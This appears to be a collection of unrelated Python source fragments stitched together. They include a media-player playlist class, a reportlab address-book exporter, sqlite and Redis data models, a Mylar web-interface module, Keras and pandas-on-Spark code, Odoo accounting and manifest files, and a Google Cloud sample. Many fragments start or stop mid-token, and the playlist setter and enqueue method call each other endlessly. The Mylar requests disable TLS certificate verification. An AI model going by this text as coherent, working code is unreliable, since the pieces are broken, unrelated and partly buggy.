rmine if a self.supported = ["mp4", "avi", "mkv", "flv", ".aac", "3gp"] # add more later # creating an instance of the vlc window # local socket connection to the vlc player @property def playlist(self): '''returns list of file paths''' return self._playlist @property def connection_open(self): return self._player.is_playing() @playlist.setter def playlist(self, arg): """Takes a string, tuple or a list as an argument and updates the player's playlist and the local_playlist variable enqueues the vlc object with a playlist of all the files stored in it can only add files to the playlist""" if isinstance(arg, (list, tuple)): for path in arg: self.check_path(path) if not path in self._playlist: data = self._enqueue(path) elif isinstance(arg, str): self.check_path(arg) if not arg in self._playlist: data = self._enqueue(arg) @playlist.deleter def playlist(self): '''clears the local playlist var and the remote one''' self._playlist = [] self.clear() def create_player(self): if self.playlist == []: raise Exception("The video player has no files ot add") else: self._player = omxplayer.OMXPlayer(self._playlist[0]) def check_path(self, path): '''Ensures all files added to the application are valid paths.''' if not os.path.isfile(path): raise FileNotFoundException() path, file = os.path.split(path) name, ext = file.split(".") if ext not in self.supported: raise UnsupportedFileTypeException() def toggle_fullscreen(self): '''For compatibility''' return True def toggle_loop(self): '''for compatibility''' return True def pause(self): """Checks the current state to make sure the player is playing something""" if self._player: self._player.pause() def play(self): """First checks if a valid file is currently loaded.""" if self._player: self._player.play() def stop(self): """checks first if there is something to stop""" if self._player: self._player.stop() def _enqueue(self, path): '''adds a file to the playlist''' self.playlist = path def clear(self): '''clears all files from the playlist''' del self.playlist def playlist_loop(self): """Get the currently playing video get its remaining time by subtracting its current time from its duration and creating a new instance for each file""" if not self._player: self.create_player() while True: time.sleep(0.5) remaining = self._player.duration() - self._player.position() if remaining < 1: current = self._playlist.index(self._player.get_source()) if current < len(self._playlist) - 2: next = self._playlist[current + 1] else: next = self._playlist[0] self._player.load(next)
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Table, TableStyle, PageBreak from reportlab.lib.styles import getSampleStyleSheet from reportlab.rl_config import defaultPageSize from reportlab.lib.units import cm import operator import os import ConfigParser import string config = ConfigParser.ConfigParser() config.read(os.environ["HOME"] + "/.abook/addressbook") config.remove_section('format') PAGE_HEIGHT=defaultPageSize[1]; PAGE_WIDTH=defaultPageSize[0] styles = getSampleStyleSheet() buchstabe = "A" Title = "Hello world" pageinfo = "platypus example" def Pages(canvas, doc): canvas.saveState() canvas.restoreState() def go(buchstabe): doc = SimpleDocTemplate("phello.pdf") Story = [] style = styles["Normal"] addresses=[] for s in config.sections(): nb="" ub="" mb="" if config.has_option(s,'name'): nb = "<b>" + config.get(s,'name') + "</b><br/>" worte=config.get(s,'name').split() print len(worte) if len(worte)<2: nachname=worte[0] else: nachname=worte[1] anfangsbuchstabe=nachname[0:1] if anfangsbuchstabe!=buchstabe: buchstabe=anfangsbuchstabe print buchstabe p = Table(addresses) p.setStyle(TableStyle([('VALIGN',(0,0),(-1,-1),"TOP"), ('ALIGN',(0,-1),(0,-1),'RIGHT')])) Story.append(p) Story.append(PageBreak()) addresses=[] if config.has_option(s,'address'): nb = nb + config.get(s,'address') + "<br/>" if config.has_option(s,'zip'): nb = nb + config.get(s,'zip') + " " if config.has_option(s,'city'): nb = nb + config.get(s,'city') + "<br/>" if config.has_option(s,'state'): nb = nb + config.get(s,'state') + " - " if config.has_option(s,'country'): nb = nb + config.get(s,'country') + "<br/>" nb = nb +"<br/>" if config.has_option(s,'phone'): ub= "Fon: " + config.get(s,'phone') + "<br/>" if config.has_option(s,'mobile'): ub= ub + "Mobi: " + config.get(s,'mobile') + "<br/>" if config.has_option(s,'email'): ub= ub + config.get(s,'email').replace(',','<br/>') + "<br/>" ub=ub+"<br/>" if config.has_option(s,'custom3'): mb= config.get(s,'custom3') + "<br/>" mb=mb+"<br/>" nameblock = Paragraph(nb,style) numberblock = Paragraph(ub,style) middleblock = Paragraph(mb,style) addresses.append([nameblock,middleblock,numberblock]) p = Table(addresses) p.setS
tyle(TableStyle([('VALIGN',(0,0),(-1,-1),"TOP"), ('ALIGN',(0,-1),(0,-1),'RIGHT')])) Story.append(p
) doc.build(Story, onFirstPage=Pages, onLaterPages=Pages) go(buchstabe)
import sqlite3 class Database: def __init__(self, dbfile, page_rows=100): self.dbfile = dbfile self.page_rows = page_rows self.conn = sqlite3.connect(self.dbfile) self.conn.row_factory = sqlite3.Row cursor = self.conn.cursor() cursor.execute( "CREATE TABLE IF NOT EXISTS messages " "(timestamp TEXT, message TEXT);" ) cursor.execute( "CREATE INDEX IF NOT EXISTS messages_timestamp_idx " "ON messages (timestamp);" ) self.conn.commit() def __del__(self): if self.conn: self.conn.close() self.conn = None def count(self): cursor = self.conn.cursor() n = cursor.execute("SELECT COUNT(*) FROM messages").fetchone()[0] return n def messages(self, offset=0): cursor = self.conn.cursor() rows = cursor.execute( "SELECT * FROM messages " "ORDER BY timestamp DESC " "LIMIT ? " "OFFSET ?", [self.page_rows
, offset] ).fetchall() return [ dict(row) for row in rows ] def save(self, item): saved = False if item.item_type == 'message': timestamp = item.content['timestamp'] message = item.asJson()
cursor = self.conn.cursor() cursor.execute( "INSERT INTO messages VALUES (?,?)", [timestamp, message] ) self.conn.commit() saved = True return saved
from flask import Flask from os.path import expanduser def c
reate_app(): app = Flask(__name__) app.config.from_pyfile(expanduser('~/.directory-tools.py'
)) from directory_tools.frontend import frontend app.register_blueprint(frontend) return app
import array class vec(object): @staticmethod def sized(size, type='d'): return vec([0] * size, type) @staticmethod def of(content, type='d'): return vec(content, type) def __init__(self, content, type='d'): self.size = len(content) self.type = type self.array = array.array(type, content) def __add__(self, other): return self.add(other) def add(self, other, out=None): assert isinstance(oth
er, vec) result = out if result is None:
result = vec([0] * self.size, self.type) if self.size != other.size: raise Exception("size mismatch! %d != %d" % (self.size,other.size)) i = 0 while i < self.size: result.array[i] = self.array[i] + other.array[i] i += 1 return result def __sub__(self, other): return self.sub(other) def sub(self, other, out=None): assert isinstance(other, vec) result = out if result is None: result = vec([0] * self.size, self.type) if self.size != other.size: raise Exception("size mismatch! %d != %d" % (self.size,other.size)) i = 0 while i < self.size: result.array[i] = self.array[i] - other.array[i] i += 1 return result def __mul__(self, other): return self.mul(other) def mul(self, other, out=None): assert isinstance(other, vec) result = out if result is None: result = vec([0] * self.size, self.type) if self.size != other.size: raise Exception("size mismatch! %d != %d" % (self.size,other.size)) i = 0 while i < self.size: result.array[i] = self.array[i] * other.array[i] i += 1 return result
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright (C) 2013 PolyBeacon, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF
ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Server Specific Configurations server = { 'port': '9859', 'host': '0.0.0.0', } # Pecan Application Configurations app = { 'root': 'payload.api.controllers.root.RootController', 'modules': ['payload.api'], 'static_root': '%(confdir)s/public', 'tem
plate_path': '%(confdir)s/payload/api/templates', }
#!/usr/bin/env python """ $ python cmdln_main2.py This is my shell. $ python cmdln_main2.py foo
hello from foo """ import sys import cmdln class Shell(cmdln.RawCmdln): "This is my shell." name = "shell" def do_foo(self, argv): print("hello from foo") if __name__ == "__main__": shell = S
hell() retval = shell.cmd(sys.argv[1:]) # just run one command sys.exit(retval)
# coding: utf-8 from libs.redis_storage import db1 class User(object): def __init__(self, **kwargs): pk = kwargs.get('pk') or db1.incr('new_user_id') kwargs['pk'] = pk db1.hmset('user::{}'.format(pk), kwargs) super(User, self).__setattr__('pk', pk) super(User, self).__setattr__( '__info__', db1.hgetall(self.db_key) or {} ) for k, v in self.__info__.iteritems(): self.__info__[k] = v.decode('utf-8') @property def short_info(self): return {field: getattr(self, field) for field in [ 'fio', 'sex', 'avatar', 'battles', 'wins',
'defeats', 'last_update' ]}
@property def db_key(self): return 'user::{}'.format(self.pk) @property def fio(self): return u'{} {}'.format(self.last_name or u'', self.first_name or u'') @property def battles(self): return int(self.__info__.get('battles', 0)) @property def wins(self): return int(self.__info__.get('wins', 0)) @property def defeats(self): return int(self.__info__.get('defeats', 0)) @property def last_update(self): return int(self.__info__.get('last_update', 0)) def __setattr__(self, attr, value): self.__info__[attr] = value db1.hset(self.db_key, attr, value) def __getattr__(self, attr): return self.__info__.get(attr) def incr(self, attr, by=1): db1.hincrby(self.db_key, attr, by) def get_user_by_service(service, service_user_id): user_pk = db1.get('{}_user_id::{}'.format(service, service_user_id)) if user_pk: return User(pk=user_pk) def add_service_to_user(service, service_user_id, user_pk): db1.set('{}_user_id::{}'.format(service, service_user_id), user_pk) user = User(pk=user_pk) setattr(user, '{}_user_id'.format(service), service_user_id)
'}, {'type': 'text', 'label': 'IP / Host *', 'name': 'mylar_host'}, {'type': 'text', 'label': 'Port *', 'name': 'mylar_port'}, {'type': 'text', 'label': 'Basepath', 'name': 'mylar_basepath'}, {'type': 'text', 'label': 'API key', 'name': 'mylar_apikey'}, {'type': 'bool', 'label': 'Use SSL', 'name': 'mylar_ssl'}, {"type": "text", "label": "Reverse proxy link", "placeholder": "", "desc": "Reverse proxy link ex: https://hp.domain.com", "name": "mylar_reverse_proxy_link"} ] }) @cherrypy.expose() @require() def index(self): return serve_template('mylar.html', scriptname='mylar', webinterface=Mylar.webinterface() ) @cherrypy.expose() @require() def GetThumb(self, url=None, thumb=None, h=None, w=None, o=100): """ Parse thumb to get the url and send to htpc.proxy.get_image """ self.logger.debug("Trying to fetch image via %s", url) if url is None and thumb is None: # To stop if the image is missing return # Should never used thumb, to lazy to remove it if thumb: url = thumb return get_image(url, h, w, o) @cherrypy.expose() @require() def viewcomic(self, artist_id): response = self.fetch('getComic&id=%s' % artist_id) for a in response['comic']: a['StatusText'] = _get_status_icon(a['Status']) a['can_download'] = True if a['Status'] not in ('Downloaded', 'Snatched', 'Wanted') else False template = htpc.LOOKUP.get_template('mylar_view_comic.html') return template.render( scriptname='mylar_view_comic', comic_id=artist_id, comic=response['comic'][0], comicimg=response['comic'][0]['ComicImageURL'], issues=response['issues'], description=response['comic'][0]['Description'], module_name=htpc.settings.get('mylar_name', 'Mylar') ) @staticmethod def _build_url(ssl=None, host=None, port=None, base_path=None): ssl = ssl or htpc.settings.get('mylar_ssl') host = host or htpc.settings.get('mylar_host') port = port or htpc.settings.get('mylar_port') path = fix_basepath(htpc.settings.get('mylar_basepath', '/')) url = '{protocol}://{host}:{port}{path}'.format( protocol='https' if ssl else 'http', host=host, port=port, path=path, ) return url @staticmethod def webinterface(): url = Mylar._build_url() if htpc.settings.get('mylar_reverse_proxy_link'): url = htpc.settings.get('mylar_reverse_proxy_link') return url @staticmethod def _build_api_url(command, url=None, api_key=None): return '{url}api?apikey={api_key}&cmd={command}'.format( url=url or Mylar._build_url(), api_key=api_key or htpc.settings.get('mylar_apikey'), command=command, ) @cherrypy.expose() @cherrypy.tools.json_out() @require() def getserieslist(self): return self.fetch('getIndex') @cherrypy.expose() @cherrypy.tools.json_out() @require() def GetWantedList(self): return self.fetch('getWanted') @cherrypy.expose() @cherrypy.tools.json_out() @require() def SearchForComic(self, name): return self.fetch('findComic&%s' % urlencode({'name': name.encode(encoding='UTF-8', errors='strict')})) @cherrypy.expose() @require() def RefreshComic(self, Id): return self.fetch('refreshComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def DeleteComic(self, Id): return self.fetch('delComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def PauseComic(self, Id): return self.fetch('pauseComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ResumeComic(self, Id): return self.fetch('resumeComic&id=%s' % Id, text=True) @cherrypy.expose() @require() def QueueIssue(self, issueid=None, new=False, **kwargs): # Force check if new: return self.fetch('queueIssue&id=%s&new=True' % issueid, text=True) return self.fetch('queueIssue&id=%s' % issueid, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def UnqueueIssue(self, issueid, name=''): self.logger.debug('unqued %s' % name) return self.fetch('unqueueIssue&id=%s' % issueid, text=True) @cherrypy.expose() @require() def DownloadIssue(self, issueid, name=''): """ downloads a issue via api and returns it to the browser """ self.logger.debug('Downloading issue %s' % name) getfile = self.fetch('downloadIssue&id=%s' % issueid, img=True) try: with closing(StringIO()) as f: f = StringIO() f.write(getfile) return cherrypy.lib.static.serve_fileobj(f.getvalue(), content_type='application/x-download', disposition=None, name=name, debug=False) except Exception as e: self.logger.error('Failed to download %s %s %s' % (name, issueid, e)) @cherrypy.expose() @cherrypy.tools.json_out() @require() def AddComic(self, id, **kwargs): self.logger.debug('Added %s to mylar' % kwargs.get('name', '')) return self.fetch('addComic&id=%s' % id) @cherrypy.expose() @cherrypy.tools.json_out() @require() def GetHistoryList(self): return self.fetch('getHistory') @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceSearch(self): return self.fetch('forceSearch', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceProcess(self, dir_=None): if dir_: return self.fetch('forceProcess?dir_=%s' % dir_, text=True) return self.fetch('forceProcess', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceActiveArtistsUpdate(self): return self.fetch('forceActiveComicsUpdate', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ShutDown(self): retu
rn self.fetch('shutdown', text=True) @cherrypy.expose() @require(mem
ber_of(htpc.role_user)) def UpDate(self): return self.fetch('update', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ReStart(self): return self.fetch('restart', text=True) def fetch(self, command, url=None, api_key=None, img=False, json=True, text=False): url = Mylar._build_api_url(command, url, api_key) try: if img or text: json = False result = '' self.logger.debug('calling api @ %s' % url) # set a high timeout as some requests take a while.. response = requests.get(url, timeout=120, verify=False) if response.status_code != 200: self.logger.error('failed to contact mylar') return if text: result = response.text if img: result = response.content if json: result = response.json() #self.logger.debug('Response: %s' % result) return result except Exception as e: self.logger.error("Error calling api %s: %s" % (url, e)) @cherrypy.tools.json_out() @cherrypy.expose() @require(member_of(htpc.role_user)) def ping(self, mylar_enable, mylar_name, mylar_host, mylar_port, mylar_basepath, mylar_apikey, mylar_ssl=False, mylar_reverse_proxy_link=None): url = Mylar._build_url( mylar_ssl, mylar_host, mylar_port, mylar_basepath, ) return sel
"""Custom keras layers """ # Coding: utf-8 # File name: custom_layer.py # Created: 2016-07-24 # Description: ## v0.0: File created. MergeRowDot layer. from __future__ import division from __future__ import print_function __author__ = "Hoang Nguyen" __email__ = "hoangnt@ai.cs.titech.ac.jp" from keras import backend as K from keras.engine.topology import Merge import numpy as np # >>> BEGIN CLASS RowDot <<< clas
s RowDot(Merge): """ Layer for element wise merge mul and take sum along the second axis. """ ##################################################################### __init__ def __init__
(self, layers=None, **kwargs): """ Init function. """ super(RowDot, self).__init__(layers=None, **kwargs) ######################################################################### call def call(self, inputs, **kwargs): """ Layer logic. """ print('Inputs 0 shape: %s' % str(inputs[0].shape)) print('Inputs 1 shape: %s' % str(inputs[1].shape)) l1 = inputs[0] l2 = inputs[1] output = K.batch_dot(inputs[0], inputs[1], axes=[1,1]) return output # === End CLASS MergeRowDot <<< # >>> BEGIN HELPER FUNCTIONS <<< ############################################################################ dot
Numeric array + Non-numeric array for numeric_col in self.numeric_array_df_cols: for non_numeric_col in self.non_numeric_array_df_cols: self.assertRaises(TypeError, lambda: psdf[numeric_col] + psdf[non_numeric_col]) def test_sub(self): self.assertRaises(TypeError, lambda: self.psser - "x") self.assertRaises(TypeError, lambda: self.psser - 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] - psdf[other_col]) def test_mul(self): self.assertRaises(TypeError, lambda: self.psser * "x") self.assertRaises(TypeError, lambda: self.psser * 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] * psdf[other_col]) def test_truediv(self): self.assertRaises(TypeError, lambda: self.psser / "x") self.assertRaises(TypeError, lambda: self.psser / 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] / psdf[other_col]) def test_floordiv(self): self.assertRaises(TypeError, lambda: self.psser // "x") self.assertRaises(TypeError, lambda: self.psser // 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] // psdf[other_col]) def test_mod(self): self.assertRaises(TypeError, lambda: self.psser % "x") self.assertRaises(TypeError, lambda: self.psser % 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] % psdf[other_col]) def test_pow(self): self.assertRaises(TypeError, lambda: self.psser ** "x") self.assertRaises(TypeError, lambda: self.psser ** 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] ** psdf[other_col]) def test_radd(self): self.assertRaises(TypeError, lambda: "x" + self.psser) self.assertRaises(TypeError, lambda: 1 + self.psser) def test_rsub(self): self.assertRaises(TypeError, lambda: "x" - self.psser) self.assertRaises(TypeError, lambda: 1 - self.psser) def test_rmul(self): self.assertRaises(TypeError, lambda: "x" * self.psser) self.assertRaises(TypeError, lambda: 2 * self.psser) def test_rtruediv(self): self.assertRaises(TypeError, lambda: "x" / self.psser) self.assertRaises(TypeError, lambda: 1 / self.psser) def test_rfloordiv(self): self.assertRaises(TypeError, lambda: "x" // self.psser) self.assertRaises(TypeError, lambda: 1 // self.psser) def test_rmod(self): self.assertRaises(TypeError, lambda: 1 % self.psser) def test_rpow(self): self.assertRaises(TypeError, lambda: "x" ** self.psser) self.assertRaises(TypeError, lambda: 1 ** self.psser) def test_and(self): self.assertRaises(TypeError, lambda: self.psser & True) self.assertRaises(TypeError, lambda: self.psser & False) self.assertRaises(TypeError, lambda: self.psser & self.psser) def test_rand(self): self.assertRaises(TypeError, lambda: True & self.psser) self.assertRaises(TypeError, lambda: False & self.psser) def test_or(self): self.assertRaises(TypeError, lambda: self.psser | True) self.assertRaises(TypeError, lambda: self.psser | False) self.assertRaises(TypeError, lambda: self.psser | self.psser) def test_ror(self): self.assertRaises(TypeError, lambda: True | self.psser) self.assertRaises(TypeError, lambda: False | self.psser) def test_from_to_pandas(self): pdf, psdf = self.array_pdf, self.array_psdf for col in self.array_df_cols: pser, psser = pdf[col], psdf[col] self.assert_eq(pser, psser.to_pandas()) self.assert_eq(ps.from_pandas(pser), psser) def test_isnull(self): pdf, psdf = self.array_pdf, self.array_psdf for col in self.array_df_cols: pser, psser = pdf[col], psdf[col] self.assert_eq(pser.isnull(), psser.isnull()) def test_astype(self): self.assert_eq(self.pser.astype(str), self.psser.astype(str)) def test_neg(self): self.assertRaises(TypeError, lambda: -self.psser) def test_abs(self): self.assertRaises(TypeError, lambda: abs(self.psser)) def test_invert(self): self.assertRaises(TypeError, lambda: ~self.psser) def test_eq(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] == pdf["that_array"], psdf["this_array"] == psdf["that_array"] ) self.assert_eq( pdf["this_struct"] == pdf["that_struct"], psdf["this_struct"] == psdf["that_struct"] ) self.assert_eq( pdf["this_array"] == pdf["this_array"], psdf["this_array"] == psdf["this_array"] ) self.assert_eq( pdf["this_struct"] == pdf["this_struct"], psdf["this_struct"] == psdf["this_struct"] ) def test_ne(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] != pdf["that_array"], psdf["this_array"] != psdf["that_array"] ) self.assert_eq( p
df["this_struct"] != pdf["that_struct"], psdf["this_struct"] != psdf["that_struct"] ) self.assert_eq( pdf["this_array"] != pdf["this_array"], psdf["this_array"] != psdf["this_array"] ) self.assert_eq( pdf["this_struct"] !
= pdf["this_struct"], psdf["this_struct"] != psdf["this_struct"] ) def test_lt(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] < pdf["that_array"], psdf["this_array"] < psdf["that_array"] ) self.assert_eq( pdf["this_struct"] < pdf["that_struct"], psdf["this_struct"] < psdf["that_struct"] ) self.assert_eq( pdf["this_array"] < pdf["this_array"], psdf["this_array"] < psdf["this_array"] ) self.assert_eq( pdf["this_struct"] < pdf["this_struct"], psdf["this_struct"] < psdf["this_struct"] ) def test_le(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] <= pdf["that_array"], psdf["this_array"] <= psdf["that_array"] ) self.assert_eq( pdf["this_struct"] <= pdf["that_struct"], psdf["this_struct"] <= psdf["that_struct"] ) self.assert_eq( pdf["this_array"] <= pdf["this_array"], psdf["this_array"] <= psdf["this_array"] ) self.assert_eq( pdf["this_struct"] <= pdf["this_struct"], psdf["this_struct"] <= psdf["this_struct"] ) def test_gt(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] > pdf["that_array"], psdf["this_array"] > psdf["that_array"] ) self.assert_eq( pdf["this_struct"] > pdf["that_struct"], psdf["this_struct"] > psdf["that_struct"] ) self.assert_eq( pdf["this_array"] > pdf["this_array"], psdf["this_array"] > psdf["this_array"] ) self.assert_eq( pdf["this_struct"] > pdf["this_struct"], psdf["this_struct"] > psdf["this_struct"] ) def test_ge(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] >= pdf["that_array"], psdf["this_array"] >= psdf["that_array"] ) self.assert_eq(
ase_value: val['value_residual'] = purchase_value - salvage_value if salvage_value: val['value_residual'] = purchase_value - salvage_value return {'value': val} def _entry_count(self, cr, uid, ids, field_name, arg, context=None): MoveLine = self.pool('account.move.line') return { asset_id: MoveLine.search_count(cr, uid, [('asset_id', '=', asset_id)], context=context) for asset_id in ids } _columns = { 'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}), 'entry_count': fields.function(_entry_count, string='# Asset Entries', type='integer'), 'name': fields.char('Asset Name', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}), 'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}), 'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False
)]}), 'note': fields.text('Note'), 'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}), 'parent_id': fields.many2one('acc
ount.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}), 'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets', copy=True), 'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True, copy=False, help="When an asset is created, the status is 'Draft'.\n" \ "If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \ "You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."), 'active': fields.boolean('Active'), 'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}), 'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\ " * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \ " * Degressive: Calculated on basis of: Residual Value * Degressive Factor"), 'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"), 'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"), 'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}), 'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}), 'value_residual': fields.function(_amount_residual, method=True, digits_compute=dp.get_precision('Account'), string='Residual Value'), 'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the dates and number of depreciation lines.\n"\ " * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \ " * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."), 'prorata':fields.boolean('Prorata Temporis', readonly=True, states={'draft':[('readonly',False)]}, help='Indicates that the first depreciation entry for this asset have to be done from the purchase date instead of the first January'), 'history_ids': fields.one2many('account.asset.history', 'asset_id', 'History', readonly=True), 'depreciation_line_ids': fields.one2many('account.asset.depreciation.line', 'asset_id', 'Depreciation Lines', readonly=True, states={'draft':[('readonly',False)],'open':[('readonly',False)]}), 'salvage_value': fields.float('Salvage Value', digits_compute=dp.get_precision('Account'), help="It is the amount you plan to have that you cannot depreciate.", readonly=True, states={'draft':[('readonly',False)]}), } _defaults = { 'code': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.asset.code'), 'purchase_date': lambda obj, cr, uid, context: time.strftime('%Y-%m-%d'), 'active': True, 'state': 'draft', 'method': 'linear', 'method_number': 5, 'method_time': 'number', 'method_period': 12, 'method_progress_factor': 0.3, 'currency_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.currency_id.id, 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.asset',context=context), } def _check_recursion(self, cr, uid, ids, context=None, parent=None): return super(account_asset_asset, self)._check_recursion(cr, uid, ids, context=context, parent=parent) def _check_prorata(self, cr, uid, ids, context=None): for asset in self.browse(cr, uid, ids, context=context): if asset.prorata and asset.method_time != 'number': return False return True _constraints = [ (_check_recursion, 'Error ! You cannot create recursive assets.', ['parent_id']), (_check_prorata, 'Prorata temporis can be applied only for time method "number of depreciations".', ['prorata']), ] def onchange_category_id(self, cr, uid, ids, category_id, context=None): res = {'value':{}} asset_categ_obj = self.pool.get('account.asset.category') if category_id: category_obj = asset_categ_obj.browse(cr, uid, category_id, context=context) res['value'] = { 'method': category_obj.method, 'method_number': category_obj.method_number, 'method_time': category_obj.method_time, 'method_period': category_obj.method_period, 'method_progress_factor': category_obj.method_progress_factor, 'method_end': category_obj.method_end, 'prorata': category_obj.prorata, } return res def onchange_method_time(self, cr, uid, ids, method_time='number', context=None): res = {'value': {}} if method_time != 'number': res['value'] = {'prorata': False} return res def _compute_entries(self, cr, uid, ids, period_id, context=None): result = [] period_obj = self.pool.get('account.period') depreciation_obj = self.pool.get('account.asset.depreciation.line') period = period_obj.browse(cr, uid, period_id, context=context) depreciation_ids = depreciation_obj.search(cr, uid, [('asset_id', 'in', ids), ('depreciation_date', '<=', period.date_stop), ('depreciation_date', '>=', period.date_start), ('move_check', '='
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar) # All Rights Reserved. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY
WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Stock Multic Fix', 'version': '8.0.1.0.1', 'category': 'Ware
house Management', 'sequence': 14, 'summary': '', 'description': """ Stock Multic Fix ================================== """, 'author': 'ADHOC SA', 'website': 'www.adhoc.com.ar', 'license': 'AGPL-3', 'images': [ ], 'depends': [ 'stock_account', ], 'data': ['stock_view.xml' ], 'demo': [ ], 'test': [ ], 'installable': True, 'auto_install': False, 'application': False, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
from button import Button class SellButton(Button): def __init__(self, image, x, y, parent): super(SellButton, self).__init__(image, x, y, parent) def get_click
ed(self): self.parent.s
ell_tower()
# -*- coding: utf-8 -*- # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distribute
d on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Generated code. DO NOT EDIT! # # Snippet for DeleteRegistration # NOTE: This snippet has been automatically generated for illustrative purposes only. # It may requir
e modifications to work in your environment. # To install the latest published package dependency, execute the following: # python3 -m pip install google-cloud-domains # [START domains_v1_generated_Domains_DeleteRegistration_sync] from google.cloud import domains_v1 def sample_delete_registration(): # Create a client client = domains_v1.DomainsClient() # Initialize request argument(s) request = domains_v1.DeleteRegistrationRequest( name="name_value", ) # Make the request operation = client.delete_registration(request=request) print("Waiting for operation to complete...") response = operation.result() # Handle the response print(response) # [END domains_v1_generated_Domains_DeleteRegistration_sync]
